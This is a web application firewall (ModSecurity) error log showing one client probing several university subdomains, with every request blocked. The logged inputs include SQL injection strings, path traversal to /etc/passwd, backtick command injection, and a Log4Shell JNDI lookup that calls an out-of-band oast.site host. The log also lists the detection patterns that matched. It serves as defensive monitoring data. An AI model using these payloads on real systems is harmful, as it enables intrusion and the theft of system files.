[Tue Aug 29 11:31:16.554015 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQP65gAAAAx"]
[Tue Aug 29 11:31:16.649253 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQQyjgAAAAy"]
[Tue Aug 29 11:31:16.710795 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAPMmHcAAAAY"]
[Tue Aug 29 11:31:16.757335 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAN@5DcAAAAO"]
[Tue Aug 29 11:31:16.758070 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP05KQAAAAA"]
[Tue Aug 29 11:31:16.758299 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP8GykAAAAV"]
[Tue Aug 29 11:31:17.320080 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAP@MxMAAAAZ"]
[Tue Aug 29 11:31:17.320272 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQIS70AAAAq"]
[Tue Aug 29 11:31:17.322246 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAPDn5YAAAAP"]
[Tue Aug 29 11:31:17.323899 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQMrpQAAAAu"]
[Tue Aug 29 11:31:17.324483 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAP8GysAAAAV"]
[Tue Aug 29 11:31:17.331421 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQSWKkAAAA0"]
[Tue Aug 29 11:31:17.338650 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAOM4d0AAAAU"]
[Tue Aug 29 11:31:17.340890 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQJWrQAAAAr"]
[Tue Aug 29 11:31:17.341392 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAP@MxQAAAAZ"]
[Tue Aug 29 11:31:17.343108 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAPMmHkAAAAY"]
[Tue Aug 29 11:31:17.343149 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQR44AAAAAz"]
[Tue Aug 29 11:31:17.343935 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAPDn5cAAAAP"]
[Tue Aug 29 11:31:17.343990 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQP65wAAAAx"]
[Tue Aug 29 11:31:17.355187 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQDFSYAAAAl"]
[Tue Aug 29 11:31:17.360036 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAOM4d4AAAAU"]
[Tue Aug 29 11:31:17.365186 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAPDn5gAAAAP"]
[Tue Aug 29 11:31:17.365657 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQP650AAAAx"]
[Tue Aug 29 11:31:17.366178 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQJWrUAAAAr"]
[Tue Aug 29 11:31:17.406742 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lcCo-f0AAAPMmHoAAAAY"]
[Tue Aug 29 11:31:18.326804 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg1dbji34jsobef.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAP7dZEAAAAR"]
[Tue Aug 29 11:31:18.328293 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQNwEwAAAAv"]
[Tue Aug 29 11:31:18.337122 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPRNgUAAAAf"]
[Tue Aug 29 11:31:18.355657 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPPS1wAAAAd"]
[Tue Aug 29 11:31:18.393142 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgqknx1r5w5i85r.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQP658AAAAx"]
[Tue Aug 29 11:31:18.443232 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQEGHIAAAAm"]
[Tue Aug 29 11:31:20.311500 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10mMCo-f0AAAQSWLEAAAA0"]
[Tue Aug 29 11:31:20.342430 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQTKG4AAAA1"]
